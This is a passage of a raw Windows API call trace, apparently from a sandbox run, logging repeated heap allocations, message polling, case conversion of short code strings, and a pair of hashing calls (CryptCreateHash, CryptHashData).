lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.709] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0165.709] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0165.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0165.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.709] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0165.709] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.710] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0165.710] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.710] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0165.710] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.710] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.710] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0165.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0165.710] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.711] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.711] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0165.711] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0165.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0165.711] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0165.711] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.711] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0165.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0165.711] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.711] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.711] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0165.712] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0165.712] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.712] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.712] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.712] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.712] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0165.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.713] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0165.713] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.713] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0165.713] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.713] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.713] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0165.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.714] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0165.714] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0165.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.714] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.715] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.715] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.715] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.716] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0165.716] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0165.716] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.716] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0165.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.717] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.717] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.717] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.717] CryptHashData (hHash=0xaa55e0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0165.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0165.718] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0165.718] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.718] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0165.718] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.718] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.719] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.719] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.719] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0165.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.719] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0165.719] PeekMessageW (in: 